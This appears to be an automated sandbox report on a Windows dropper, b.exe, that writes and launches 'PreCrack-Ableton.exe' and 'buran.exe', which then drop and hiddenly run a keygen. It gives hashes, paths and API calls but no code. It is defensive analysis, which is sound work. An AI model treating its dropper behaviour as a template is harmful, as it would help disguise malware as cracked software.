b.exe
Windows Exe (x86-32)
Created at 2019-07-04T15:36:00
Monitored Processes
Behavior Information - Grouped by Category
Process #1: b.exe
98
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\users\5p5nrgjn0js halpmcxz\desktop\b.exe |
| Command Line | "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\b.exe" |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:00:26, Reason: Analysis Target |
| Unmonitor | End Time: 00:00:32, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x99c |
| Parent PID | 0x45c (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
9A0
0x
9AC
0x
9B0
0x
9B4
0x
9B8
0x
9C8
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| b.exe | 0x01320000 | 0x015D4FFF | Relevant Image | - | 32-bit | - |
|
|
|
| b.exe | 0x01320000 | 0x015D4FFF | Process Termination | - | 32-bit | - |
|
|
|
Dropped Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\5P5NRG~1\AppData\Local\Temp\PreCrack-Ableton.exe | 1.24 MB |
MD5:
ec367a19c43ab8a12921ddc16d29c37e
SHA1: 6ae78c9a5da4ad6a87ded49d7d700b43bdc28171 SHA256: 84b315464f9786e590299675b6a01f8f7efcaa1b55d78522d86e51cd41621394 SSDeep: 24576:Wo6cLUNPPqWymPLbyrsb0Y667qr/qGMOvI9+f1gBxh/EcHG:WhA4PPCmTGIJGbPMOvuOkhsCG |
|
|
| C:\Users\5P5NRG~1\AppData\Local\Temp\buran.exe | 156.00 KB |
MD5:
55030a1c4072b1b0b3c33ba32003b8b5
SHA1: dd0c8fb141b27a9bc0f7c3c21646c0ef6b503632 SHA256: 7ddbd9d156f58969e172c3ecc91b230ac1dff4c185fa7db0cf07aa2c4e3ea18f SSDeep: 3072:HEX73H1IPfe7ng9UfmeUS1ZQb/LvmL6A41q6FCCBXnOMkm6Hl9B:kX7m+SUay+AIq6YCoMkd/ |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\b.exe | 2.68 MB |
MD5:
fc567799b91d2020f9d756282dae2edf
SHA1: c76fe5112cc24347b31f3c3dc5485a01c3e2debd SHA256: 62bcddc16c633da20dd5b41ebda1fc304707ab3c9fdb22431e2a0f41190ee3e6 SSDeep: 49152:aw80cTsjOWa7dExFV4ZncpsD/8g8SIybfNsgEtI/C7m3knlSaM:f8sjOGxmcpw/DJIyjNsgr/omOlm |
|
|
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\b.exe | 2.68 MB |
MD5:
59adda78b9454ccdc9dd60e26c3febe9
SHA1: 7b604899853e32f96978b6e2f0e1c23a039c63d9 SHA256: 5265949ef50212948a216c1d46cfae48e927d164c101dcd91083ef4b23f6c09e SSDeep: 49152:ow80cTsjkWa7dExFV4Zncpsxi/8g8SIybfNsgItI/C7m3knlSa:58sjkGxmcpqi/DJIyjNsg3/omOl |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\b.exe | 2.68 MB |
MD5:
fc567799b91d2020f9d756282dae2edf
SHA1: c76fe5112cc24347b31f3c3dc5485a01c3e2debd SHA256: 62bcddc16c633da20dd5b41ebda1fc304707ab3c9fdb22431e2a0f41190ee3e6 SSDeep: 49152:aw80cTsjOWa7dExFV4ZncpsD/8g8SIybfNsgEtI/C7m3knlSaM:f8sjOGxmcpw/DJIyjNsgr/omOlm |
|
|
Host Behavior
File (12)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\b.exe | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\5P5NRG~1\AppData\Local\Temp\PreCrack-Ableton.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | C:\Users\5P5NRG~1\AppData\Local\Temp\buran.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\b.exe | type = file_type |
|
2 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Read | C:\Users\5P5NRG~1\AppData\Local\Temp\PreCrack-Ableton.exe | size = 65536, size_out = 0 |
|
1 | |
| Read | C:\Users\5P5NRG~1\AppData\Local\Temp\buran.exe | size = 65536, size_out = 0 |
|
1 |
Registry (3)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Control Panel\Mouse | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\AutoIt v3\AutoIt | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Control Panel\Mouse | value_name = SwapMouseButtons, data = 48 |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\5P5NRG~1\AppData\Local\Temp\PreCrack-Ableton.exe | show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Users\5P5NRG~1\AppData\Local\Temp\buran.exe | show_window = SW_SHOWNORMAL |
|
1 |
Module (54)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x76c20000 |
|
5 | |
| Load | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\b.exe | base_address = 0x1320000 |
|
2 | |
| Load | Crypt32.dll | base_address = 0x759b0000 |
|
4 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 |
|
1 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\b.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\b.exe, size = 260 |
|
1 | |
| Get Filename | - | process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\b.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\b.exe, size = 32767 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x76c34f2b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x76c3359f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x76c31252 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x76c34208 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x76c34d28 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x76cb410b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x76cb4195 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x76c3d31f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x76c4ee7e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7717441c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7719c381 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x76c4f088 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x771805d7 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7719ca24 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77150b8c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x771a1e1d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x76cb4761 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x76cacd11 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x76cb424f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x76cb46b1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x76cc6676 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x76cb4751 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x76cc65f1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x76cb47c1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x76cb47e1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x76cb47f1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x76c4eee0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetNativeSystemInfo, address_out = 0x76c410b5 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Wow64DisableWow64FsRedirection, address_out = 0x76c4d650 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Wow64RevertWow64FsRedirection, address_out = 0x76c4d668 |
|
2 |
Window (2)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | AutoIt v3 | class_name = AutoIt v3, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = edit, wndproc_parameter = 0 |
|
1 |
System (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 750 milliseconds (0.750 seconds) |
|
2 | |
| Get Time | type = System Time, time = 2019-07-04 15:37:05 (UTC) |
|
14 | |
| Get Time | type = Performance Ctr, time = 14953554856 |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Debug (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Check for Presence | c:\users\5p5nrgjn0js halpmcxz\desktop\b.exe | - |
|
1 |
Process #2: precrack-ableton.exe
782
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\users\5p5nrg~1\appdata\local\temp\precrack-ableton.exe |
| Command Line | "C:\Users\5P5NRG~1\AppData\Local\Temp\PreCrack-Ableton.exe" |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:00:30, Reason: Child Process |
| Unmonitor | End Time: 00:01:05, Reason: Self Terminated |
| Monitor Duration | 00:00:34 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9bc |
| Parent PID | 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\b.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
9C0
0x
9D8
0x
9DC
0x
A30
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| precrack-ableton.exe | 0x00400000 | 0x0044EFFF | Relevant Image | - | 32-bit | - |
|
|
|
Dropped Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\5P5NRG~1\AppData\Local\Temp\R2RLIVE.dll | 314.21 KB |
MD5:
fbd46335cabce4a96f315d0c89c8cd09
SHA1: a338681d5b6157eda00f8e20f25959cc58b30ccd SHA256: 0fd18a0dcf5c1e67f652ef3cafa271c8f513065380f426e7c6a7b9c246b8891f SSDeep: 6144:dhvbQpsp4WdikT1uzSPLODpzrGXxjLje7xZOub9WxlTcFiDeN+Gq+:dhcpsp3T1uzSC3+xjL03Zb9Wx2QKEj+ |
|
|
| C:\Users\5P5NRG~1\AppData\Local\Temp\keygen.exe | 635.61 KB |
MD5:
a870e917d041d74c09a99c322b13709a
SHA1: c1706f6b4f876fc5238eda8ca5bf12f2d992da1f SHA256: 0cb1c127272a6b8f69ee52488fc51991d42cb021bdcd0a404c294b4011b30f87 SSDeep: 12288:7Eb6CmonRVnsQ5o6w6mRVzEelVbw67JSvWvfkBf:7umonR5fjoOAVbDJMWvfkBf |
|
|
| C:\Users\5P5NRG~1\AppData\Local\Temp\BASSMOD.dll | 33.50 KB |
MD5:
e4ec57e8508c5c4040383ebe6d367928
SHA1: b22bcce36d9fdeae8ab7a7ecc0b01c8176648d06 SHA256: 8ad9e47693e292f381da42ddc13724a3063040e51c26f4ca8e1f8e2f1ddd547f SSDeep: 768:qQmS5iUgi5czW+DlrQOS1DeDdjgNtbX4O6DHix84H0:qQz5Tgof+DdpS1+djctLSHiZ0 |
|
|
| C:\Users\5P5NRG~1\AppData\Local\Temp\bgm.xm | 1.04 MB |
MD5:
eac249a6cbd92e5a744f1921261b4134
SHA1: 3c1be061f209bf9cef151399f896a1e7927bb2cb SHA256: 9ae311e672f224a27350dd37cce871187377531741df048082b9cb680cd12882 SSDeep: 24576:njg85PbKWstZdIzNIPRnuEHDGLG5nyQweozKajh/q0nqVVjAsOktahU5F+eOohVz:njgcPuWs6zNIeLG5nyQweozKa1/q0nqH |
|
|
Host Behavior
File (712)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\5P5NRG~1\AppData\Local\Temp\PreCrack-Ableton.exe | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_TEMPORARY, FILE_FLAG_DELETE_ON_CLOSE |
|
1 | |
| Create | C:\Users\5P5NRG~1\AppData\Local\Temp\BASSMOD.dll | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5P5NRG~1\AppData\Local\Temp\bgm.xm | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5P5NRG~1\AppData\Local\Temp\keygen.exe | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5P5NRG~1\AppData\Local\Temp\R2RLIVE.dll | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\5P5NRG~1\AppData\Local\Temp\ | - |
|
1 | |
| Create Directory | C:\Users | - |
|
1 | |
| Create Directory | C:\Users\5P5NRG~1 | - |
|
1 | |
| Create Directory | C:\Users\5P5NRG~1\AppData | - |
|
1 | |
| Create Directory | C:\Users\5P5NRG~1\AppData\Local | - |
|
1 | |
| Create Directory | C:\Users\5P5NRG~1\AppData\Local\Temp | - |
|
1 | |
| Create Temp File | C:\Users\5P5NRG~1\AppData\Local\Temp\nsi8D12.tmp | path = C:\Users\5P5NRG~1\AppData\Local\Temp\, prefix = nsi |
|
1 | |
| Create Temp File | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | path = C:\Users\5P5NRG~1\AppData\Local\Temp\, prefix = nsn |
|
1 | |
| Get Info | C:\Users\5P5NRG~1\AppData\Local\Temp\PreCrack-Ableton.exe | type = file_attributes |
|
1 | |
| Get Info | C:\Users\5P5NRG~1\AppData\Local\Temp\PreCrack-Ableton.exe | type = size |
|
1 | |
| Get Info | C:\Users | type = file_attributes |
|
1 | |
| Get Info | C:\Users\5P5NRG~1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\5P5NRG~1\AppData | type = file_attributes |
|
1 | |
| Get Info | C:\Users\5P5NRG~1\AppData\Local | type = file_attributes |
|
1 | |
| Get Info | C:\Users\5P5NRG~1\AppData\Local\Temp | type = file_attributes |
|
1 | |
| Get Info | C:\Users\5P5NRG~1\AppData\Local\Temp\BASSMOD.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Users\5P5NRG~1\AppData\Local\Temp\bgm.xm | type = file_attributes |
|
2 | |
| Get Info | C:\Users\5P5NRG~1\AppData\Local\Temp\keygen.exe | type = file_attributes |
|
2 | |
| Get Info | C:\Users\5P5NRG~1\AppData\Local\Temp\R2RLIVE.dll | type = file_attributes |
|
2 | |
| Read | C:\Users\5P5NRG~1\AppData\Local\Temp\PreCrack-Ableton.exe | size = 512, size_out = 512 |
|
249 | |
| Read | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 4, size_out = 4 |
|
5 | |
| Read | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 2394, size_out = 2394 |
|
1 | |
| Read | C:\Users\5P5NRG~1\AppData\Local\Temp\PreCrack-Ableton.exe | size = 16384, size_out = 16384 |
|
67 | |
| Read | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 16384, size_out = 16384 |
|
126 | |
| Read | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 1540, size_out = 1540 |
|
1 | |
| Read | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 8015, size_out = 8015 |
|
1 | |
| Read | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 11887, size_out = 11887 |
|
1 | |
| Read | C:\Users\5P5NRG~1\AppData\Local\Temp\PreCrack-Ableton.exe | size = 11650, size_out = 11650 |
|
1 | |
| Read | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 10456, size_out = 10456 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 19614 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 16236 |
|
2 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 32768 |
|
30 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 20569 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\BASSMOD.dll | size = 16384 |
|
2 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\BASSMOD.dll | size = 1540 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 26561 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 30607 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 25586 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 27612 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 26814 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 31831 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 23613 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 27077 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 28184 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 934 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 17236 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 13399 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 23199 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 5063 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 2470 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 2761 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 5936 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 8946 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 1213 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 17032 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 1369 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 19145 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 10911 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 8804 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 7840 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\bgm.xm | size = 16384 |
|
66 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\bgm.xm | size = 8015 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 1019 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 257 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 72 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 32677 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 30407 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 31593 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 26446 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 11454 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 2203 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 25191 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 25153 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 26250 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 25122 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 368 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 4133 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 16127 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 16155 |
|
3 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 16165 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 16161 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 17001 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\keygen.exe | size = 16384 |
|
39 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\keygen.exe | size = 11887 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 16182 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 16205 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 16202 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 16238 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 16228 |
|
2 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 16252 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 16254 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 16215 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 16198 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 16200 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 16209 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 16513 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 17919 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 16588 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 16605 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 18143 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\nsn8D32.tmp | size = 12215 |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\R2RLIVE.dll | size = 16384 |
|
19 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\R2RLIVE.dll | size = 10456 |
|
1 | |
| Delete | C:\Users\5P5NRG~1\AppData\Local\Temp\nsi8D12.tmp | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\5P5NRG~1\AppData\Local\Temp\keygen.exe | os_pid = 0x9e0, creation_flags = CREATE_DEFAULT_ERROR_MODE, show_window = SW_HIDE |
|
1 |
Module (21)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Windows\system32\UXTHEME.dll | base_address = 0x745d0000 |
|
1 | |
| Load | C:\Windows\system32\USERENV.dll | base_address = 0x74900000 |
|
1 | |
| Load | C:\Windows\system32\SETUPAPI.dll | base_address = 0x75c00000 |
|
1 | |
| Load | C:\Windows\system32\APPHELP.dll | base_address = 0x74560000 |
|
1 | |
| Load | C:\Windows\system32\PROPSYS.dll | base_address = 0x747f0000 |
|
1 | |
| Load | C:\Windows\system32\DWMAPI.dll | base_address = 0x745b0000 |
|
1 | |
| Load | C:\Windows\system32\CRYPTBASE.dll | base_address = 0x74c80000 |
|
1 | |
| Load | C:\Windows\system32\OLEACC.dll | base_address = 0x74520000 |
|
1 | |
| Load | C:\Windows\system32\CLBCATQ.dll | base_address = 0x752b0000 |
|
1 | |
| Load | C:\Windows\system32\VERSION.dll | base_address = 0x74b50000 |
|
1 | |
| Load | C:\Windows\system32\SHFOLDER.dll | base_address = 0x74720000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 |
|
2 | |
